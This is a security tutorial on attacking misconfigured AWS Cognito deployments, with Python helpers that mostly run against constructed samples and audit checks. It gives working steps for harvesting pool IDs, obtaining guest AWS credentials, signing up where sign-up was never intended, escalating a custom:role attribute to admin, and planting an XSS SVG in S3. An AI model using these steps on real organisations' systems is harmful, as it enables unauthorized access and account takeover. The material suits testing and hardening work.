What Is AWS Cognito and Why Do Organizations Use It?

Amazon Cognito is an AWS service that provides authentication, authorization, and user management for web and mobile applications. It supports sign-in with various providers such as Facebook, Google, or Apple. The service has two main components, user pools and identity pools, which can be used separately or together.

User pools provide sign-up and sign-in, customizable web UIs, social sign-in, user directory management, MFA and account takeover protection, customized workflows, and user migration through AWS Lambda triggers. Identity pools exchange a token from a user pool or a third-party identity provider (or, if enabled, an unauthenticated guest identity) for temporary AWS credentials tied to an IAM role, which is how an application gets access to other AWS services such as S3 or DynamoDB.

Amazon Cognito user pools can serve as user directories for web or mobile apps, allowing users to sign in and federate through a third-party identity provider. Every member of the user pool has a directory profile that can be accessed through an SDK.

Amazon Cognito is available in various AWS regions worldwide, with distributed availability zones that ensure high levels of availability, redundancy, and low-latency network connections.

How does it work?

The authentication flow when a user pool and an identity pool are used together is as follows:

  1. The client authenticates against an Amazon Cognito user pool.
  2. Upon successful authentication, the user pool issues three tokens to the client: an ID token and an access token (both JSON Web Tokens, JWTs) and a refresh token.
  3. The client passes the ID token to the Amazon Cognito identity pool.
  4. The identity pool uses the claims in the ID token (for example the user's groups) to determine which IAM role the user may assume.
  5. The identity pool then provides the user with temporary AWS credentials for the IAM role that was mapped to the user's group.

With these temporary credentials, the user can call AWS services such as DynamoDB, limited to whatever the role's IAM policy permits.

In summary, the user first authenticates against the user pool to receive JWTs, then uses the ID token to get temporary AWS credentials from the identity pool, which grants them access to AWS services according to their IAM role.

How to identify?

You can identify organizations that use AWS Cognito by observing the requests that their application makes in the background. User pool calls go to cognito-idp.<region>.amazonaws.com and identity pool calls go to cognito-identity.<region>.amazonaws.com. You will also see the X-Amz-Target header, whose value names the operation being performed: when logging in, for example, it is AWSCognitoIdentityProviderService.InitiateAuth, and an identity pool request carries a value such as AWSCognitoIdentityService.GetId.

Examining the source code of a web page can provide valuable information about a target application. The JavaScript may contain hardcoded values such as usernames, passwords, and API keys that are useful later on.

In a Cognito-backed application the hardcoded configuration typically includes the region, the user pool ID, the app client ID, the identity pool ID, and the names and regions of S3 buckets.

This information provides valuable insight into the target, including the various IDs and the regions of the buckets, and it is exactly what the calls in the following sections need.
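The following is an added example, not code from the original article, that automates the identification step: it classifies captured HTTP requests by Cognito host and X-Amz-Target header, and pulls the identifiers out of page source. The identifier shapes (user pool `<region>_<suffix>`, identity pool `<region>:<uuid>`, 26-character app client ID) are the documented ones; the captured requests and the JS bundle are constructed samples, and the 26-character match is only a heuristic, so it is reported as a candidate.

```python
import json
import re

# Documented shapes of the identifiers a Cognito app embeds in its front end:
# user pool id "<region>_<alphanumeric suffix>", identity pool id "<region>:<uuid>",
# app client id 26 lowercase alphanumerics. The 26-char pattern is only a
# heuristic, so those matches are reported as candidates.
REGION = r"[a-z]{2}-[a-z]+-\d"
USER_POOL_ID_RE = re.compile(rf"\b{REGION}_[A-Za-z0-9]{{6,}}\b")
IDENTITY_POOL_ID_RE = re.compile(
    rf"\b{REGION}:[0-9a-f]{{8}}-[0-9a-f]{{4}}-[0-9a-f]{{4}}-[0-9a-f]{{4}}-[0-9a-f]{{12}}\b")
CLIENT_ID_RE = re.compile(r"\b[a-z0-9]{26}\b")
COGNITO_HOST_RE = re.compile(rf"^(cognito-idp|cognito-identity)\.({REGION})\.amazonaws\.com$")


def classify_request(host, headers, body):
    """Describe a captured HTTP request if it targets Cognito, else return None.

    The host tells us the service (user pool vs identity pool) and the region,
    X-Amz-Target names the operation, and the JSON body carries the identifiers
    the later CLI calls need (ClientId, IdentityPoolId, ...)."""
    m = COGNITO_HOST_RE.match(host.lower())
    if not m:
        return None
    service, region = m.groups()
    hdrs = {k.lower(): v for k, v in headers.items()}
    target = hdrs.get("x-amz-target", "")
    info = {
        "service": service,
        "region": region,
        # "AWSCognitoIdentityProviderService.InitiateAuth" -> "InitiateAuth"
        "operation": target.rsplit(".", 1)[-1] if target else None,
    }
    try:
        data = json.loads(body) if body else {}
    except ValueError:
        data = {}
    for key in ("ClientId", "IdentityPoolId", "UserPoolId", "AuthFlow", "IdentityId"):
        if key in data:
            info[key] = data[key]
    return info


def harvest_ids(text):
    """Pull Cognito identifiers out of page source or a JS bundle."""
    return {
        "user_pool_ids": sorted({m.group(0) for m in USER_POOL_ID_RE.finditer(text)}),
        "identity_pool_ids": sorted({m.group(0) for m in IDENTITY_POOL_ID_RE.finditer(text)}),
        "client_id_candidates": sorted({m.group(0) for m in CLIENT_ID_RE.finditer(text)}),
    }


# Constructed samples standing in for a proxy capture and a page's JS bundle.
SAMPLE_REQUESTS = [
    ("cognito-idp.us-west-2.amazonaws.com",
     {"Content-Type": "application/x-amz-json-1.1",
      "X-Amz-Target": "AWSCognitoIdentityProviderService.InitiateAuth"},
     json.dumps({"AuthFlow": "USER_PASSWORD_AUTH",
                 "ClientId": "3n4k5p6q7r8s9t0u1v2w3x4y5z",
                 "AuthParameters": {"USERNAME": "alice", "PASSWORD": "redacted"}})),
    ("cognito-identity.us-west-2.amazonaws.com",
     {"x-amz-target": "AWSCognitoIdentityService.GetId"},
     json.dumps({"IdentityPoolId": "us-west-2:11111111-2222-3333-4444-555555555555"})),
    ("api.example.com", {"Authorization": "Bearer redacted"}, ""),
]

SAMPLE_BUNDLE = """
var awsconfig = {
  aws_project_region: "us-west-2",
  aws_cognito_identity_pool_id: "us-west-2:11111111-2222-3333-4444-555555555555",
  aws_user_pools_id: "us-west-2_aBcDeFgHi",
  aws_user_pools_web_client_id: "3n4k5p6q7r8s9t0u1v2w3x4y5z",
  aws_user_files_s3_bucket: "example-uploads-prod",
  aws_user_files_s3_bucket_region: "us-west-2"
};
"""

if __name__ == "__main__":
    for host, headers, body in SAMPLE_REQUESTS:
        print(host, "->", classify_request(host, headers, body))
    print(harvest_ids(SAMPLE_BUNDLE))
```

Feed classify_request the host, headers and body of each request from a proxy export (a HAR file, for instance) and harvest_ids the text of every script the page loads; the service/region/operation triple from the first and the IDs from the second are the inputs for the CLI calls in the next sections.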

Retrieving Temporary credentials

  1. To retrieve the IdentityId, first copy the identityPoolId from the source code and then run the following command. GetId is an unsigned operation, so no AWS credentials need to be configured.
     $ aws cognito-identity get-id --identity-pool-id <identity-pool-id> --region us-west-2
  2. Next, use the IdentityId to obtain temporary credentials.
     $ aws cognito-identity get-credentials-for-identity --identity-id <identity-id> --region us-west-2
  3. Notice that we have not authenticated at all, yet we hold AWS credentials: the identity pool allows unauthenticated (guest) identities and hands out its unauthenticated role. Let's check which permissions those credentials carry. For that we can use the tool enumerate-iam.
     $ python enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN
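The same flow as an added example (not code from the original article or from AWS): it performs steps 3 to 5 of the identity pool flow described above, GetId followed by GetCredentialsForIdentity, as raw unsigned JSON calls carrying the X-Amz-Target header, and prints the export lines the later tooling needs. The identity pool ID is a constructed value, and the fake_identity_pool transport is a constructed stand-in for the service so the flow runs offline; its NotAuthorizedException text mirrors the message Cognito returns when a pool has no unauthenticated access.

```python
import json
import urllib.error
import urllib.request

# Identity pool id as it would be copied from the target's JS bundle (constructed value).
IDENTITY_POOL_ID = "us-west-2:11111111-2222-3333-4444-555555555555"


def _urllib_send(url, headers, body):
    """Default transport: POST and return the response body, also on HTTP errors,
    because Cognito describes failures in a JSON body ({"__type": ..., "message": ...})."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.read()
    except urllib.error.HTTPError as err:
        return err.read()


def cognito_identity_call(region, operation, payload, send=None):
    """Unsigned JSON call to cognito-identity.<region>.amazonaws.com.

    GetId and GetCredentialsForIdentity need no AWS credentials; the X-Amz-Target
    header names the operation. `send(url, headers, body) -> bytes` replaces the
    transport, which is how the offline stand-in below is plugged in."""
    url = f"https://cognito-identity.{region}.amazonaws.com/"
    headers = {
        "Content-Type": "application/x-amz-json-1.1",
        "X-Amz-Target": f"AWSCognitoIdentityService.{operation}",
    }
    return json.loads((send or _urllib_send)(url, headers, json.dumps(payload).encode()))


def get_temporary_credentials(identity_pool_id, logins=None, send=None):
    """GetId followed by GetCredentialsForIdentity (steps 3 to 5 of the flow).

    Without `logins` this asks for an unauthenticated (guest) identity, which only
    succeeds when the pool has unauthenticated access enabled. For an authenticated
    identity pass {"cognito-idp.<region>.amazonaws.com/<userPoolId>": id_token}."""
    region = identity_pool_id.split(":", 1)[0]
    payload = {"IdentityPoolId": identity_pool_id}
    if logins:
        payload["Logins"] = logins
    got = cognito_identity_call(region, "GetId", payload, send)
    if "IdentityId" not in got:
        raise PermissionError(f"GetId: {got.get('__type')}: {got.get('message')}")
    payload = {"IdentityId": got["IdentityId"]}
    if logins:
        payload["Logins"] = logins
    creds = cognito_identity_call(region, "GetCredentialsForIdentity", payload, send)
    if "Credentials" not in creds:
        raise PermissionError(f"GetCredentialsForIdentity: {creds.get('__type')}: {creds.get('message')}")
    return got["IdentityId"], creds["Credentials"]


def unauthenticated_access_allowed(identity_pool_id, send=None):
    """True when the pool hands credentials to anyone who knows its id."""
    try:
        get_temporary_credentials(identity_pool_id, send=send)
        return True
    except PermissionError:
        return False


def env_exports(credentials):
    """Shell lines that point the AWS CLI, enumerate-iam or Prowler at the temporary keys.
    Note the field name SecretKey (not SecretAccessKey) in the Cognito response."""
    return "\n".join([
        f"export AWS_ACCESS_KEY_ID={credentials['AccessKeyId']}",
        f"export AWS_SECRET_ACCESS_KEY={credentials['SecretKey']}",
        f"export AWS_SESSION_TOKEN={credentials['SessionToken']}",
    ])


def fake_identity_pool(allow_unauthenticated=True):
    """Constructed stand-in for the service so the flow runs offline."""
    def send(url, headers, body):
        operation = headers["X-Amz-Target"].split(".", 1)[1]
        request = json.loads(body)
        if operation == "GetId":
            if not allow_unauthenticated and "Logins" not in request:
                reply = {"__type": "NotAuthorizedException",
                         "message": "Unauthenticated access is not supported for this identity pool."}
            else:
                reply = {"IdentityId": request["IdentityPoolId"].split(":")[0]
                         + ":aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"}
        elif operation == "GetCredentialsForIdentity":
            reply = {"IdentityId": request["IdentityId"],
                     "Credentials": {"AccessKeyId": "ASIAEXAMPLEEXAMPLE", "SecretKey": "examplesecret",
                                     "SessionToken": "exampletoken", "Expiration": 1700000000}}
        else:
            reply = {"__type": "UnknownOperationException", "message": operation}
        return json.dumps(reply).encode()
    return send


if __name__ == "__main__":
    # Pass send=None (and a real pool id) to talk to the actual service instead.
    identity_id, credentials = get_temporary_credentials(IDENTITY_POOL_ID, send=fake_identity_pool())
    print("IdentityId:", identity_id)
    print(env_exports(credentials))
    print("guest access:", unauthenticated_access_allowed(IDENTITY_POOL_ID, send=fake_identity_pool(False)))
```

Run unauthenticated_access_allowed against the real pool first: a False answer means the pool is configured correctly and the rest of this section does not apply, while True reproduces the finding above without needing the AWS CLI installed.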

Alternative tools for enumeration

Prowler

Prowler is an Open Source Security tool for AWS, Azure and GCP to perform Cloud Security best practices assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. It contains hundreds of controls covering CIS, PCI-DSS, ISO27001, GDPR, HIPAA, FFIEC, SOC2, AWS FTR, ENS and custom security frameworks.

ScoutSuite

Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.

Using them is a simple process. Let's see how to run Prowler:

  1. Configure an AWS CLI profile with the temporary credentials, including the session token (aws configure set aws_access_key_id, aws_secret_access_key and aws_session_token for that profile).
  2. pip install prowler
  3. prowler aws --profile <your-profile-name>

Let's try these actions quickly. Export the temporary credentials as the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN environment variables, then make calls with the AWS CLI. A successful call (aws sts get-caller-identity needs no permissions and returns the ARN of the unauthenticated role) confirms that the identity pool handed out working credentials.

Exploiting S3 with Temporary credentials

  1. Check whether the temporary credentials give access to S3, for example by listing buckets and objects (aws s3 ls).
  2. If they do, try to upload a file that contains malicious content, for example an SVG with an embedded script (stored XSS).
  3. Navigate to https://<bucket-name>.s3.amazonaws.com/xss.svg. The script only runs if the object is publicly readable and served with an image/svg+xml content type (which aws s3 cp normally sets for .svg files), and it runs on the S3 origin, so the impact depends on whether the application serves content from that bucket.

Misconfigurations in User Pool

How Does User Pool work?

To authenticate a user, the application prompts them to enter their username and password. The user then submits this information as parameters when calling InitiateAuth (for example with the USER_PASSWORD_AUTH flow). Amazon Cognito responds by providing a session identifier and, when MFA is configured, an SMS_MFA challenge.

The application requests the user to enter the MFA code sent to their phone, and the user submits this code along with the session identifier via the RespondToAuthChallenge request. Depending on the user pool’s settings, multiple challenges may be required before the application can retrieve tokens from Amazon Cognito.

If the authentication is successful, Amazon Cognito issues access, ID, and refresh tokens for the session.

Authentication bypass

  1. If an organization is using Cognito for internal or inter-organizational purposes, there is a higher likelihood that they only rely on login and never intended self-service sign-up, without having disabled it in the user pool.
  2. As Cognito can be driven through the AWS CLI, we can attempt to sign up for an account with a simple command. The client ID can be found in the source code.
     $ aws cognito-idp sign-up --client-id <client-id> --username Randomusername --password 'Randompassword' --region us-west-2 --user-attributes 'Name=email,Value=random@redacted.com'
  3. In this way, even if the portal exposes no sign-up page, we can still create an account by calling SignUp directly. If self sign-up is disabled the call fails with NotAuthorizedException (SignUp is not permitted for this user pool); if the app client has a secret the call also needs a SECRET_HASH; and an email or phone verification step may follow before the new account can log in.

Privilege escalation

  1. After logging into the application, you are issued an access token (the one described at the beginning of the article), which can be used to perform various API calls. User information can be retrieved with just the access token (the get-user operation). Among the attributes returned you will notice a role parameter which defines that user's privileges. Let's try to modify it via the AWS CLI.
  2. Use the update-user-attributes call (aws cognito-idp update-user-attributes, which takes only the access token plus the attribute name and value) to check whether the role parameter can be updated.
  3. Retrieve the user's information again and see whether it has been updated.

As we can see, the role is updated to admin without any error.

It is necessary to check whether users really need write access to sensitive attributes. The control is the app client's attribute read and write permissions: an attribute that drives authorization must not be writable by the end user, and the application should rely on cognito:groups (or a server-side lookup) rather than on a self-managed attribute. A small mistake in permissions can lead to privilege escalation.
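As an added example for both the authentication bypass and the privilege escalation sections above (not code from the original article or from AWS), the block below builds the SignUp and UpdateUserAttributes request bodies that the CLI commands send, computes the SECRET_HASH an app client with a secret requires, decodes the claims of an ID token to see which attributes the user carries, and runs the defensive check: which sensitive attributes an app client leaves writable. The page does not name the role attribute, so it is modelled here as a custom attribute custom:role; the app client description, the token and the sensitive-attribute list are constructed samples.

```python
import base64
import hashlib
import hmac
import json

# Attributes whose value the application uses for authorization decisions.
# Constructed list for this example; take the real one from the target's schema.
SENSITIVE_ATTRIBUTES = {"custom:role", "custom:is_admin", "custom:tenant_id"}


def secret_hash(username, client_id, client_secret):
    """SECRET_HASH = Base64(HMAC-SHA256(key=client_secret, msg=username + client_id)).

    SignUp, InitiateAuth and related calls are rejected for an app client that
    has a secret unless this value is included."""
    mac = hmac.new(client_secret.encode(), (username + client_id).encode(), hashlib.sha256)
    return base64.b64encode(mac.digest()).decode()


def build_signup_payload(client_id, username, password, email, client_secret=None):
    """JSON body of a SignUp call (X-Amz-Target AWSCognitoIdentityProviderService.SignUp),
    the same request that aws cognito-idp sign-up sends."""
    payload = {
        "ClientId": client_id,
        "Username": username,
        "Password": password,
        "UserAttributes": [{"Name": "email", "Value": email}],
    }
    if client_secret:
        payload["SecretHash"] = secret_hash(username, client_id, client_secret)
    return payload


def build_update_attributes_payload(access_token, attributes):
    """JSON body of UpdateUserAttributes: the access token is the only authorization."""
    return {
        "AccessToken": access_token,
        "UserAttributes": [{"Name": name, "Value": value} for name, value in attributes.items()],
    }


def decode_jwt_claims(token):
    """Return a JWT's claims without verifying the signature (inspection only,
    never for authorization). Custom attributes appear in the ID token."""
    part = token.split(".")[1]
    part += "=" * (-len(part) % 4)
    return json.loads(base64.urlsafe_b64decode(part))


def writable_sensitive_attributes(user_pool_client):
    """Audit check over a DescribeUserPoolClient result: sensitive attributes the
    app client lets the end user change through UpdateUserAttributes.

    When WriteAttributes is absent the client can write the standard attributes;
    custom attributes have to be listed explicitly, so none of the sensitive
    custom attributes is writable in that case."""
    writable = set(user_pool_client.get("WriteAttributes") or [])
    return sorted(writable & SENSITIVE_ATTRIBUTES)


# Constructed samples: an app client description and an unsigned ID token.
SAMPLE_CLIENT = {
    "ClientId": "3n4k5p6q7r8s9t0u1v2w3x4y5z",
    "ReadAttributes": ["email", "name", "custom:role"],
    "WriteAttributes": ["email", "name", "custom:role"],   # custom:role should not be here
}


def make_unsigned_jwt(claims):
    """Build a token with an empty signature purely so the decoder has input."""
    def b64(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return f"{b64({'alg': 'RS256', 'kid': 'example'})}.{b64(claims)}."


SAMPLE_ID_TOKEN = make_unsigned_jwt({
    "sub": "11111111-2222-3333-4444-555555555555",
    "token_use": "id",
    "cognito:groups": ["users"],
    "custom:role": "user",
    "email": "alice@example.com",
})

if __name__ == "__main__":
    print(build_signup_payload("3n4k5p6q7r8s9t0u1v2w3x4y5z", "alice", "Str0ngPassw0rd!",
                               "alice@example.com", client_secret="example-client-secret"))
    print("role claim:", decode_jwt_claims(SAMPLE_ID_TOKEN)["custom:role"])
    print(build_update_attributes_payload("<access-token>", {"custom:role": "admin"}))
    print("writable sensitive attributes:", writable_sensitive_attributes(SAMPLE_CLIENT))
```

Send the payloads with the cognito-idp endpoint and X-Amz-Target header described in the identification section, or pass their fields to the matching aws cognito-idp subcommands. On the defensive side, run writable_sensitive_attributes over the output of aws cognito-idp describe-user-pool-client for every app client; any attribute it lists is one a logged-in user can rewrite with nothing more than their own access token.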

Flickr account takeover due to a user pool misconfiguration

A researcher published a detailed write-up of a full Flickr account takeover caused by a user pool misconfiguration:

https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/

References:

https://notsosecure.com/hacking-aws-cognito-misconfigurations

https://www.yassineaboukir.com/talks/NahamConEU2022.pd